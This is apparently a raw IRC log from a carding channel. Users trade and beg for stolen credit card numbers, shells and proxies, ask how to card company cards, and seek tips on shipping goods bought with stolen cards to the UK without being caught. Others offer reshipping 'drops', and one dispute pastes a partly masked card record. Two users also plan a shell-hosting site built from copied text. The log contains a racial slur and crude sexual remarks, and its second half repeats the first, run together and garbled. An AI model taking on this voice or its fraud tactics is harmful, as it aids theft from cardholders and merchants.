:YesIAm! : anyone for trade round here?
:BONI! :?
:BONI! :so>?
:rgers! :hi boni
:rgers! :how are u?
:rgers! ::))
:Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells
:Papa-tudo! :anyone trade bncs with vhosts?
:Papa-tudo! :ACTION trading bncs with vhosts
:Papa-tudo! :ACTION trading bncs with vhosts
:Papa-tudo! :ACTION trading bncs with vhosts
:ureche! :re
:_Mephisto! :re
:_Mephisto! :who the fuck set that idiotic topic?
:SIZIF! :enybody have cc?
:Bl4ck_! :t4b4cu
:ucok! :come on
:Bl4ck_! :hi
:ucok! :
:ucok! :xeexxexeexxeeeexe
:t4b4cu! :hi
:dlotos33! :is there anyone from MACEDONIA?
:SIZIF! :yep
:blazo99! :what's the problem duds
:FanTom! :some one wots to trade
:GoDsHaNd! :can someone help me?
:blazo99! :what's the problem
:GoDsHaNd! :blazo99
:GoDsHaNd! :hey
:GoDsHaNd
:Pinu\away! :hi
:t4b4cu! :c
:Clasher! :Sorry to bother, but, does anyone have a spare card?
:Co0lWoRx! :
:Bl4ck_! :m4r1n4ru
:Bl4ck_! :m4r1n4ru
:Bl4ck_! :m4r1n4ru
:m4r1n4ru! :marca ma
:Co0lWoRx! :7me any1 here wanna earn +v, msg me now
:Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
:Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now
:Bl4ck_! :why am I banned on #rocarding?
:Bl4ck_! :Co0lWoRx :PP
:m4r1n4ru! :?
:Co0lWoRx! :?
:Co0lWoRx! :?
:Co0lWoRx! :???
:Bl4ck_! :Co0lWoRx I used to have +v in here
:Bl4ck_! ::>>
:Co0lWoRx! :well, y u loose it?
:Bl4ck_! :dunno
:Bl4ck_! :never minds
:Bl4ck_! ::>>
:SIZIF! :enybody have cc?
:Co0lWoRx! :look at this shit ppl
:Co0lWoRx! : do u have cc's?
:Co0lWoRx! : hmmm, yes, a lot
:Co0lWoRx! : would u like to send me just one?
:Co0lWoRx! : hahahaha, go away pls lamer
:SIZIF! :enybody have cc?
:Co0lWoRx! :ure banned man, bye
:SIZIF! :IZIF> succker >
:DuXo! :come on
:DuXo! :go shake ur dicks:)))))
:Co0lWoRx! :lol
:_Mephisto! ::P
:DuXo! :put ur dick in the Cd-rom :)) because u can`t put it in pussy :))))))
:yourlife! :?
:DuXo! :what ???
:yourlife! ::)
:m4r1n4ru! :-join #rocarding
:m4r1n4ru! :-save
:TanTouze! :I was sexually assaulted by Bill Clinton
:DuXo! :anyone here wants to be my drop?
:Sp07! :sup
:Sp07! :im done with high school
:Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa
:Sp07! :
:Sp07! :@#$
:Sp07! :
:Sp07! :
:DuXo! :bye to all
:_Mephisto! :bya
:_Mephisto! :bye
:Tzaranul! :aaa
:Tzaranul! :re
:Tzaranul! ::)
:SPANkY_! :anyone here trade msg me
:SPANkY_! :anyone here trade msg me
:Nightw|sH! :re Bl4ck
:SPANkY_! :anyone here trade msg me
:trinix! :sup all?
:trinix! :any one want to send some ccs over my way?
:trinix! :any one want to send some ccs over my way?
:SPANkY_! :anyone here trade msg me
:D1ck! :ins
:D1ck! :J4n3
:SPANkY_! :anyone here trade msg me
:SPANkY_! :anyone here trade msg me
:SPANkY_! :anyone here trade msg me
:dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices
:Cyb3rL0rd! :re ppl
:Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
:hackmon! :bye
:Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ?
:Fr0d! :any1 op/voice wanna trade
:m4r1n4ru! :-op
:Co0lWoRx! :hello
:Fr0d`! :hey
:Fr0d`! :sup manm
:Bl4ck_! :Chel00 heya
:m4r1n4ru! :ajajajajaj
:Co0lWoRx! :lol
:Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks?
:Bl4ck_! :coz is an emech
:Bl4ck_! :Chel00 say hi Co0lWoRx
:Bl4ck_! ::>
:Chel00! :hi Co0lWoRx
:Bl4ck_! ::PP
:Co0lWoRx! :lol
:Co0lWoRx! :ok
:_KAoS_! :anyone in that wants to trade?
:Fr0d! :msg me
:Co0lWoRx! :bbl
:TanTouze! :sell me something.... anything. QUICK
:Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]-
:Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s
:m4r1n4ru! :-op
:m4r1n4ru! :-op
:connex! :i need a cc to buy a shell...anybody can help me?
:[Mighty]! :trade CC ?
:Fr0d! :msg me
:connex! :yes or visa(master)
:Tzaranul! :re
:Tzaranul! ::)
:connex! :i need a cc to buy a shell...anybody can help me?
:connex! :i need a cc to buy a shell...anybody can help me?
:_Mephisto! :where do you buy the shell???
:Bl4ck_! :www.turbulent.net
:Bl4ck_! :www.turboshell.com
:Bl4ck_! :www.shellyeah.org
:Bl4ck_! :www.bestshell.com
:_Mephisto! :thx
:Bl4ck_! ::>
:[sm0ke]! :is turbulent.net cardable?
:m4r1n4ru! :nope
:m4r1n4ru! :ajajajaaja
:[sm0ke]! :hehe. i knew it. .
:[sm0ke]! :u have to mail da freakin receipt. .. to have it activated. .
:connex! :i need a cc to buy a shell...anybody can help me?
:connex! :pls help me
:_Mephisto! :bye
:connex! :i need a cc to buy a shell...anybody can help me?
:connex! :pls help me
:[sm0ke]! :buy a shell? where?
:connex! :[sm0ke] help me
:connex! :[sm0ke] help me i want to buy a shell
:TheRason! :hello anybody
:TheRason! :i need a cc to buy a web domain
:[sm0ke]! :
:card-it! :trading lists, /msg me....
:card-it! :trading lists and merchants, /msg me....
:card-it! :no traders in here?
:Bl4ck_! :ACTION is away -[ Starcraft and this and that ]- at 06:26a -[ P:On / L:On ]-
:card-it! :trading lists and merchants, /msg me....
:card-it! :trading lists and merchants, /msg me....
:card-it! :trading lists and merchants, /msg me....
:card-it! :trading lists and merchants, /msg me....
:card-it! :trading lists and merchants, /msg me....
:|Makaveli! :how can we get the +v???
:|Makaveli! :or an op
:gatorade^! :ACTION is trading ccz msg me
:J4n3! :D1ck ?
:D1ck! :yep
:D1ck! :y0
:D1ck! :i am from my dad's laptiop
:D1ck! :sun
:D1ck! :i need a webpage
:D1ck! :for the box
:J4n3! :webpage ?
:D1ck! :deal finialised
:D1ck! :and u know how can i accept credit card online?
:J4n3! :yeah u can but there will be a lot of fraud, but
:D1ck! :?
:J4n3! :if u set the rule that they fax or email the scanned copy of the credit card then it's fine
:D1ck! :we have to pay for fraud or its their responsibility/
:D1ck! :oh
:D1ck! :kool
:J4n3! :yeah :)
:D1ck! ::)
:D1ck! :can u start the page
:D1ck! :?
:J4n3! :what happened with the server ?
:J4n3! :the webpage will be done right away, I have the material from j0e's site with me, just need the prices
:J4n3! :what's the compnay name ? i mean site name ?
:J4n3! :?
:D1ck! :got d/c
:J4n3! :wb
:J4n3! :the webpage will be done right away, I have the material from j0e's site with me, just need the prices
:D1ck! :thx
:J4n3! :what's the compnay name ? i mean site name ?
:D1ck! :company's name is 'Big Stuff'
:D1ck! :or u have any beter name?
:D1ck! :i want a site some thing like www.unixrules.net
:D1ck! :i`ll tell u the prices
:J4n3! :hmm
:J4n3! :unixrules is booked i think
:D1ck! :no no
:D1ck! :i am ssaying
:D1ck! :look at their page
:D1ck! :it rox
:J4n3! :oh u mean designing ?
:D1ck! :yeps
:D1ck! :hehe
:D1ck! :'Big Stuff'
:D1ck! :The Ultimate Web Solution.
:J4n3! :hmm
:D1ck! :till when will be the website complete?
:J4n3! :wait lemme take a look
:D1ck! :oki
:J4n3! :hmm yeah saw it
:D1ck! :kewl
:D1ck! :what prices should we do?
:J4n3! :no idea i think it should start from 9 to 10 $ for shell
:J4n3! :3 to 4 for bnc
:D1ck! :oki
:J4n3! :webhosting i'll ask j0e
:D1ck! :okies
:J4n3! :hey what bout server ??
:D1ck! : 4 background processes (eggdrop, screen, irc)
:J4n3! :got this box its fast 24.66.83.137.mb.wave.home.com
:D1ck! : 2 login names
:D1ck! : 20 MB total disk space
:D1ck! : FTP, and SSH access
:D1ck! : 2 POP3 Email addresses (username@celebreum.net)
:D1ck! : Access to hundreds of VHOSTS
:D1ck! : 3 months [$30] - 6 months [$60] - 12 months [$120]
:D1ck! : Credit Card Customers, Sign up here
:D1ck! : Sign up Now
:J4n3! :but no linux root kit :(
:D1ck! :server?
:D1ck! :heheh
:J4n3! :i mean have u finalized?
:D1ck! :my computer is not working
:D1ck! :thats why i am in this
:D1ck! :yep
:J4n3! :oh
:D1ck! :finisalised
:J4n3! :going to pay for it ?
:D1ck! :yep
:J4n3! :anuallay ?? how much ?
:D1ck! :welp
:D1ck! :200/month
:D1ck! :and rent is 25
:D1ck! :225
:J4n3! :oh kewl
:J4n3! :ip's ?
:J4n3! :how much ip's ?
:D1ck! :256
:D1ck! ::")
:J4n3! :great :)
:D1ck! :hehe
:D1ck! :wait i`ll send u .txt for shells
:D1ck! :one sec
:J4n3! :k
:J4n3! ::)
:D1ck! ::)
:J4n3! :Caldera OpenLinux(TM)
:J4n3! :Version 2.2
:J4n3! :Copyright 1996-1999 Caldera Systems, Inc.
:D1ck! :hey accept this
:J4n3! :send send
:J4n3! :bin/login: error in loading shared libraries: libcrypt.so.1: cannot open shared object file: No such file or directory
:D1ck! :make it attractive and stuff
:J4n3! : DCC Unable to create connection: Connection refused
:D1ck! :err
:D1ck! :copy paste this
:D1ck! :SPECIAL PACKAGE
:D1ck! :
:D1ck! : 4 background processes (eggdrop, screen, irc, energymechs)
:D1ck! : 25 MB total disk space
:D1ck! : FTP, and SSH access
:D1ck! : 2 POP3 Email addresses (username@celebreum.net)
:D1ck! : Access to hundreds of VHOSTS
:D1ck! :
:D1ck! : 1 month [$20] 3 months [$40] - 6 months [$60] - 12 months [$120]
:D1ck! :SILVER SHELL ACCOUNT
:D1ck! : 2 background processes (eggdrop, screen, irc, energymechs)
:D1ck! : 10MB total disk space
:D1ck! : FTP, and SSH access
:D1ck! : POP3 Email addresses (username@celebreum.net)
:D1ck! : Access to hundreds of VHOSTS
:D1ck! : 1 month [$10] 3 months [$30] - 6 months [$55] - 12 months [$100]
:D1ck! :
:D1ck! :GOLD SHELL
:D1ck! : 4 background processes (eggdrop, screen, irc, energymechs)
:D1ck! : 2 login names
:D1ck! : FREE Personal vhost (username@can.choose.from.many.domains)
:D1ck! : 100 MB total disk space
:D1ck! : FTP and SSH access
:D1ck! : 2 POP3 Email addresses (username@celebreum.net)
:D1ck! : Access to hundreds of VHOSTS
:D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200]
:D1ck! :make the rupeese too pls
:D1ck! ::P
:J4n3! :hah u forgot to write the BitchX ?
:D1ck! :oh yes
:D1ck! :irc==BitchX
:J4n3! :eggdrop, screen, irc, energymechs, BitchX
:D1ck! :yep yep
:D1ck! :add it
:D1ck! ::P
:J4n3! :ok
:J4n3! :kkz wait lemme copy it
:D1ck! :hey thats stolen from unixrules
:D1ck! :so change it a bit
:D1ck! :jhehe
:D1ck! :hehe
:J4n3! :ok done :)
:J4n3! :yeah don worry prices r same ?
:J4n3! :or u modified it ?
:D1ck! :modified
:D1ck! :and mb space too
:J4n3! :kkz
:J4n3! :Celebrium ?
:D1ck! :yep
:D1ck! :ok now webpage
:D1ck! :BASIC WEBHOSTING
:D1ck! : 100MB disk space
:D1ck! : 1 Mailbox (POP3/SMTP)
:D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space
:D1ck! : 500 MB of data transfer per month
:D1ck! : 3 months [$30] - 6 months [$55] - 12 months [$100]
:D1ck! :PRIME WEBHOSTING
:D1ck! : 200 MB disk space
:D1ck! : 5 Mailboxes (POP3/SMTP)
:D1ck! : FREE Domain Name Registration (internic fee applies)
:D1ck! : Unlimited email address forwarding
:D1ck! : Custom CGI script directory
:D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space
:D1ck! : 1500 MB of data transfer per month
:D1ck! : 3 months [$60] - 6 months [$110] - 12 months [$200]
:D1ck! :PRO WEBHOSTING
:D1ck! : 350 MB disk space
:D1ck! : 25 Mailboxes (POP3/SMTP)
:D1ck! : Unlimited email address forwarding
:D1ck! : Custom CGI script directory
:D1ck! : PHP3 access
:D1ck! : Frontpage Extension access
:D1ck! : $0.50 per MB on any average storage beyond the standard allowed disk space
:D1ck! : 5000 MB of data transfer per month
:D1ck! : 3 months [$150] - 6 months [$275] - 12 months [$500]
:D1ck! :modify style and stuff here and there so it doesnt look as we stole it
:D1ck! :hehe
:J4n3! :hah nothing will come of that, anyway almost all shell offers look alike
:D1ck! :EMAIL HOSTING
:D1ck! : FREE Domain Name Registration (Internic Fee applies)
:D1ck! : username@your-company.com
:D1ck! : 5 Mailboxes (POP3)
:D1ck! : 25 Emails Forwarding
:D1ck! : 3 months [$30] - 6 months [$50] - 12 months [$75]
:D1ck! :lol
:D1ck! :yup
:D1ck! ::P
:D1ck! :hey when will it be complete
:D1ck! :asnd i am signing up legal domain
:D1ck! :where should i?
:D1ck! :cheapest
:D1ck! :?
:J4n3! :hmmm
:D1ck! :mater may we are OC3 :P
:J4n3! :dotster.com
:D1ck! :OC3 lines
:D1ck! :ok
:J4n3! :yeah from where u getting this server ? and till when u get it ?
:J4n3! :it should be on redhat ok ?
:D1ck! :easilyhosted
:D1ck! :yep
:D1ck! :it is
:D1ck! :i`ll make it ultra secure
:D1ck! :redhat 6.2
:J4n3! :haha kewl
:D1ck! :i`ll upgrade to new kernel
:J4n3! :give me 2 days for web
:D1ck! :2.2.16
:D1ck! :kewl
:D1ck! :okies
:J4n3! ::)
:D1ck! :the day u do it
:D1ck! :the next day ill get the seerver
:D1ck! :online
:J4n3! :hmmm
:J4n3! :talked to ur dad bout it ?
:D1ck! :ofcourse
:D1ck! :he sed 'yes'
:D1ck! :and i have his cc in my hand
:D1ck! ::P
:J4n3! :haha cool
:J4n3! :woooo
:J4n3! ::p
:D1ck! ::/
:J4n3! :but where did u sign up ?? with which company ?
:J4n3! :t3 ?
:J4n3! :or oc3 ?
:D1ck! :well
:D1ck! :more then Tota1KaaS1
:D1ck! :t1
:D1ck! :but
:D1ck! :technically OC3
:D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they
:D1ck! :are
:J4n3! :I see
:D1ck! :but its shared bandwith
:D1ck! :mine will be 990k/sec
:J4n3! :w00ps
:D1ck! :to 2 mb
:D1ck! :and 40 gigs of transfer
:J4n3! :shells will rock on this server
:D1ck! :yep
:D1ck! ::)
:D1ck! :and i`ve heard routers are firewalled
:D1ck! :so thats a good enws
:J4n3! :great already signed up , or going to ?
:D1ck! :hey pls get started on the page if u are not too bz
:D1ck! ::P
:D1ck! :i will send the payment
:J4n3! :yeah i will from today
:D1ck! :no cc
:D1ck! :and today i`ll buy a merchant account
:J4n3! :oh ohkay :)
:D1ck! ::)
:J4n3! :u have too many ips
:D1ck! :yep
:J4n3! :we can buy more domains illlegaly to like j0e but
:D1ck! :that rox
:D1ck! :well
:D1ck! :i can get caught
:J4n3! :first we need the dns of ur server so we can give it when registering the domain
:D1ck! ::p
:J4n3! :like ns1 and ns2
:J4n3! :they need it for registeration
:D1ck! :oh
:D1ck! :i am half way through the registration
:D1ck! :hehe
:D1ck! :so i cant modify it later?
:J4n3! :yeah :)
:D1ck! :kewl
:D1ck! :almost complete
:J4n3! ::))))))
:D1ck! :hehe
:D1ck! :a graphix of Big Tecnologies would rock
:J4n3! :sure it would , just see
:D1ck! ::/
:D1ck! :oki
:J4n3! ::9:0:)
:D1ck! ::)
:J4n3! :how do i open a telnet on a box ?? from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow
:D1ck! :err they need name serfver
:D1ck! :hehe
:D1ck! :cat /etc/inetd.conf | grep telnet
:D1ck! :and paste me here
:J4n3! :yeah wait
:J4n3! :hahah yeah
:J4n3! :its close from there
:J4n3! :the box is kewl i want to run psy from there
:J4n3! :ip is admin.cgocable.net
:J4n3! :wait lemme opne it
:D1ck! :hehhe Romanian
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:D1ck! :Anyone have any "Gold-Line" Canadian Calling card #'s ??
:m4r1n4ru! :Away
:[4g3nt]! :anyone can tell how to use a company credit card ????
:m4r1n4ru! :Away
:TanTouze! :hi goober... oops wrong window
:Ricky! :if someone would like to xchange cards contact me
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:Co0lWoRx! :yo m4r1n4ru, stop it pls
:Co0lWoRx! :yo m4r1n4ru, stop it pls
:Co0lWoRx! :yo m4r1n4ru, stop it pls
:Co0lWoRx! :yo m4r1n4ru, stop it pls
:Co0lWoRx! :damn it, im tired of all this shit
:Co0lWoRx! :ok?
:Ricky! :ii have 2 cards i will trade
:Ricky! :i dont go first
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:ABA! :Anyone want to trade cards?
:ABA! :Anyone want to trade cards?
:m4r1n4ru! :Away
:ABA! :Anyone want to trade cards? (msg me now)
:AlfonsoD! :im trading too
:ABA! :msg me AlfonsoD
:AlfonsoD! :anyone trading?
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:m4r1n4ru! :Away
:ABA! :Anyone trading cards?
:ABA! :No one trade with D4r1u55
:ABA! :Hes a ripper
:ABA! :No one trade with D4r1u55
:ABA! :Hes a ripper
:[4g3nt]! :yo
:[4g3nt]! :is a master card a 16 digit or 13 ?
:ABA! :16
:D4r1u55! :?
:ABA! :xxxx/xxxx/xxxx/xxxx
:ABA! :No one trade with D4r1u55
:ABA! :Hes a ripper
:D4r1u55! :wow
:D4r1u55! :ABA
:D4r1u55! :look here
:D4r1u55! :[10:24] Not Approved: Customer information invalid.
:D4r1u55! :[10:24] Not Approved: Invalid Credit Card Number.
:D4r1u55! :u give me 2 cc's.but are not viabils
:D4r1u55! :[10:11] Dick xxxxxxx
:D4r1u55! :[10:11] xxx St Example St
:D4r1u55! :[10:11] Somewhere US
:ABA! :I gave you two working CCs
:ABA! :then
:ABA! :you try to send me
:ABA! :some bullshit
:D4r1u55! :10:11] 10320
:D4r1u55! :[10:11] 06/200x
:D4r1u55! :[10:11] Mastercard.
:D4r1u55! :[10:11] xxxx xxxx xxxx xxxx
:D4r1u55! :[10:11] .
:ABA! :1.2meg html file
:D4r1u55! :[10:11] John Salvo
:ABA! :fucking thief
:ABA! :No one trade with D4r1u55
:ABA! :Hes a ripper
:D4r1u55! :[10:11] 1175 Example Ave
:D4r1u55! :[10:11] 33146
:D4r1u55! :[10:11] VISA
:D4r1u55! :10:11] VISA
:D4r1u55! :[10:11] 12/200x
:D4r1u55! :[10:11] xxxxxxxxxxxxxxxx
:D4r1u55! :and that's all
:ABA! :you lame gimp
:ABA! :youve got them the wrong way round
:ABA! :thief
:ABA! :No one trade with D4r1u55
:ABA! :Hes a ripper
:m4r1n4ru! :Away
:D4r1u55! :that two cc's u send to me
:D4r1u55! :and are'nt good
:D4r1u55! :dont work
:D4r1u55! :try to understand
:D4r1u55! :whatever
:[4g3nt]! :how can i card a company cc?
:yo :DuXo! :let`s got to work :DuXo! :gety :DuXo! :get :DuXo! :and try that . :Co0lWoRx! :damn it :DuXo! :what the fuck is this :) :seriuscar! :what did you have in mind about tradi :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :Drake``! :co^digigi left after ripping me :Drake``! :hehehe :Co0lWoRx! :yo drake :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :seriuscar! :have bnc, proxies and shell....msg me if want to trade :MRuiCosta! :ACTION will trade virgin mc and visa for a shell acct that lets me dns host a .net site :taur! :salut @hello :taur! :astia tac si fac @this people are doing it silently (this is "they are efficient") :ows :ows :ows :MonTs! :howdy folks? :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya :xKurko! :Can anyone do me a favour... Msg me.... Virgin CC in it for ya :iDoetS! :gollllllllllllll :iDoetS! :1 more :MonTs! :1 more for whom? :iDoetS! :ceko :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :xKurko! :can anyone gimme one fast proxy??? :m4r1n4ru! :-op :|AmDeAtH! :-op :|AmDeAtH! :lol hehe :Reaggyman! :Do sombody now what the program ares do? :Reaggyman! :whats ares? :trinix! :sup all? :Reaggyman! :trinix: do you now what ares is :trinix! :any one got any tips for ordering stuff to yer own house with out getting caugfht? :trinix! :caught? :trinix! :no :trinix! :sultrix says u guys are the ones to ask :Reaggyman! :Do you now a program that cracks sex(enter)password? :trinix! :nope :Reaggyman! :are you new here? :trinix! :yeah :Reaggyman! :me to :Reaggyman! :nowbody answers :trinix! :I am from uk :Reaggyman! :Norway :trinix! :I need help on how to order to my house with out getting caught :trinix! :using cc :Reaggyman! :What? :Reaggyman! :Order What? :trinix! :I wanna order stuff yeah but want to order straight to my house in the uk :Reaggyman! 
:isent that easy? :trinix! :hmm not sure :trinix! :I wanna an abandoned house but can't find any :Reaggyman! :I dont now :Reaggyman! :i came here to :Reaggyman! :i need a cracking program :trinix! :why dun you just go to www.xxxpassowrds.com :glipy! :what cracking program :Reaggyman! :i dont think they got THAT kind of passwords :Reaggyman! :The name is Ares :Reaggyman! :Hi sultrix :trinix! :heya man :Reaggyman! :i was band for xxxpasswords :Sultrix! :Hello :Sultrix! ::-( :Reaggyman! :Can you help me sultriz :Reaggyman! :x :Sultrix! :Can you guys help me i had a few working CC's but the dun work no more cxan anyone throw me few WORKING cc's my way please ? :Sultrix! :Reaggyman: Sure whatsup ? :Reaggyman! :Do you now a program that cracks sex(enter)password? :MonTs! :Reaggyman ....try going to http://www.catfiles.net/adult.htm :Sultrix! :hmm :Sultrix! :no idea :Reaggyman! :Monts: whats that? :MonTs! :go there and have a look :Reaggyman! :and this is :Reaggyman! :password? :Reaggyman! :Hi tauer :Tauer! :hi :Reaggyman! :can you help me? :Reaggyman! :Do you now a program that cracks sex(enter)password? :astavista! :lol :trinix! :shit can anyone slide me some tips? :tauer! :mai @ man :tauer! :asa ceva mai greu @ this is a little bit harder :trinix! :shit can anyone slide me some tips? :Reaggyman! :tauer what+ :tauer! :dar poti s-a te duci la un site care da passworduri pt siteuri de genu asta @ but you can go to a site who gives passwords for sites like that :trinix! :wtf :tauer! :sau potzi s-a te inregistrezi cu un card @ or you can register yourself with a card :Reaggyman! :English plis :tauer! :lol :tauer! :u can go to a site thwt give u password :tauer! :sheet :tauer! :sorry :trinix! :wtf :tauer! :anibody spek romanian? :trinix! :shit can anyone give me some tips? :tauer! :what kind of tips? :tauer! :trinix? :Sultrix! :in credit card fraud he means :tauer! :lol :tauer! :what i am thinking....:) :Sultrix! :heh :tauer! :the chanel carding :trinix! 
:I wanna send some stuff to my house in the uk, any tips on how to not get caught? :tauer! :is hard to someone to teel u about theat :tauer! :in uk? :tauer! :is verry hard :trinix! :what? :tauer! :but u can sendit to me in other country :trinix! :is hard to someone to teel u about theat <------------ what? :tauer! :and i can sendit to u :trinix! :nah :tauer! :about:I wanna send some stuff to my house in the uk, any tips on how to not get caught? :xKurko! :I offered that and Im in the UK with a different drop than my house :trinix! :I have cc of people in USA and wanna buy stuff in the UK and send it to me in my house :tauer! :i dont write to well in enghlish :trinix! :any tips? :tauer! :u can sendit to me in romania and i sendit to u after the pocket arieve to me :tauer! ::) :trinix! :nah take to long :tauer! :lol :tauer! :is my turn? :trinix! :besides you might keep it :tauer! :to ping time out? :tauer! :food weaponds? :tauer! :flood :trinix! :wb bro :Sultrix! :ta :Sultrix! :wassup bra :trinix! :nadda :trinix! :reading up on some shit :Sultrix! :cool :Sultrix! :Has anyone here got any WORKING CC numbers ? :tauer! :i sell vodoo 3 3000 100$ :tauer! :whith id :tauer! ::) :damang! :need some fresh cc :Sultrix! :me too :YesIAm! :haha :trinix! :me too :Sultrix! :Anyone got any cc numbers that work :trinix! :answer him god damn it :YesIAm! :my cc number works :fus10nx! :nope... :YesIAm! ::) :CC-Master! :who trade here? :fus10nx! :not U :fus10nx! :Not I :trinix! :fus10nx yeah.... :CC-Master! :? :CC-Master! :so :CC-Master! :anyone for trade round here? :damang! :shells for fresh cc :CC-Master! :what shels or ccz? :damang! :i have shelz :Sultrix! :Does anyone have any CC's ?? :CC-Master! :ye :CC-Master! :i have :CC-Master! :so? :Sultrix! :that i can have :YesIAm! :hahaahaha :Sultrix! :ffs :damang! :need some fresh cc :Sultrix! :Can nayone dish some ccs my wya pease :YesIAm! :If somebody wanted to donate a # he would paste it into the chan :damang! 
:i have shelz wana trade w/ cc :BONI! :hi anyone for trade? :YesIAm! : anyone for trade round here? :BONI! :? :BONI! :so>? :rgers! :hi boni :rgers! :how are u? :rgers! ::)) :Nic[AwaY]! :ACTION have a lot of ccs ( Mastercards and Visas ) trading for more or eggdroppable shells :Papa-tudo! :anyone trade bncs with vhosts? :Papa-tudo! :ACTION trading bncs with vhosts :Papa-tudo! :ACTION trading bncs with vhosts :Papa-tudo! :ACTION trading bncs with vhosts :ureche! :re :_Mephisto! :re :_Mephisto! :cine pizda masii a pus topicul ala idiot? @ who the fuck set that stupid topic? :SIZIF! :enybody have cc? :Bl4ck_! :t4b4cu :ucok! :hai :Bl4ck_! :salut @ hello :ucok! : :ucok! :xeexxexeexxeeeexe :t4b4cu! :salut @ hello :dlotos33! :is there anyone from MACEDONIA? :SIZIF! :yep :blazo99! :what's the problem duds :FanTom! :some one wots to trade :GoDsHaNd! :can someone help me? :blazo99! :what's the problem :GoDsHaNd! :blazo99 :GoDsHaNd! :ej :GoDsHaNd :Pinu\away! :hi :t4b4cu! :c :Clasher! :Sorry to bother, but, does anyone have a spare card? :Co0lWoRx! : :Bl4ck_! :m4r1n4ru :Bl4ck_! :m4r1n4ru :Bl4ck_! :m4r1n4ru :m4r1n4ru! :marca ma @ (???) :Co0lWoRx! :7me any1 here wanna earn +v, msg me now :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now :Co0lWoRx! :ACTION any1 here wanna earn +v, msg me now :Bl4ck_! :de ce am ban pe #rocarding? @ why am I banned on #rocarding? :Bl4ck_! :Co0lWoRx :PP :m4r1n4ru! :? :Co0lWoRx! :? :Co0lWoRx! :? :Co0lWoRx! :??? :Bl4ck_! :Co0lWoRx I used to have +v in here :Bl4ck_! ::>> :Co0lWoRx! :well, y u loose it? :Bl4ck_! :dunno :Bl4ck_! :never minds :Bl4ck_! ::>> :SIZIF! :enybody have cc? :Co0lWoRx! :look at this shit ppl :Co0lWoRx! : do u have cc's? :Co0lWoRx! : hmmm, yes, a lot :Co0lWoRx! : would u like to send me just one? :Co0lWoRx! : hahahaha, go away pls lamer :SIZIF! :enybody have cc? :Co0lWoRx! :ure banned man, bye :SIZIF! :IZIF> succker > :DuXo! :come on :DuXo! :go shake ur dicks:))))) :Co0lWoRx! :lol :_Mephisto! ::P :DuXo! 
:put ur dick in the Cd-rom :)) because u can`t put it in pussy :)))))) :yourlife! :? :DuXo! :what ??? :yourlife! ::) :m4r1n4ru! :-join #rocarding :m4r1n4ru! :-save :TanTouze! :I was sexually assaulted by Bill Clinton :DuXo! :anyone here wants to be my drop? :Sp07! :sup :Sp07! :im done with high school :Sp07! :ahahhhhhhhhhhhhhhhhhhhhhhhhhahahaa :Sp07! : :Sp07! :@#$ :Sp07! : :Sp07! : :DuXo! :bye to all :_Mephisto! :bya :_Mephisto! :bye :Tzaranul! :aaa :Tzaranul! :re :Tzaranul! ::) :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :Nightw|sH! :re Bl4ck :SPANkY_! :anyone here trade msg me :trinix! :sup all? :trinix! :any one want to send some ccs over my way? :trinix! :any one want to send some ccs over my way? :SPANkY_! :anyone here trade msg me :D1ck! :ins :D1ck! :J4n3 :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :SPANkY_! :anyone here trade msg me :dmonchild! :ACTION i am selling hardware if your intrested please /msg me for prices :Cyb3rL0rd! :re ppl :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ? :hackmon! :bye :Sultrix! :Does anyone have any WORKING credit cards the will let me have one to use ? :Fr0d! :any1 op/voice wanna trade :m4r1n4ru! :-op :Co0lWoRx! :hello :Fr0d`! :hey :Fr0d`! :sup manm :Bl4ck_! :Chel00 heya :m4r1n4ru! :ajajajajaj :Co0lWoRx! :lol :Co0lWoRx! :hey negro, do u ever wonder why Chel00 never talks? :Bl4ck_! :coz is an emech :Bl4ck_! :Chel00 say hi Co0lWoRx :Bl4ck_! ::> :Chel00! :hi Co0lWoRx :Bl4ck_! ::PP :Co0lWoRx! :lol :Co0lWoRx! :ok :_KAoS_! :anyone in that wants to trade? :Fr0d! :msg me :Co0lWoRx! :bbl :TanTouze! :sell me something.... anything. QUICK :Bl4ck_! :ACTION is away -[ bbl ]- at 04:48a -[ P:On / L:On ]- :Bl4ck_! :ACTION is back -[ bbl ]- gone 1 min 49 s :m4r1n4ru! :-op :m4r1n4ru! :-op :connex! :i need a cc to buy a shell...anybody can help me? :[Mighty]! :trade CC ? :Fr0d! :msg me :connex! :yes or visa(master) :Tzaranul! :re :Tzaranul! 
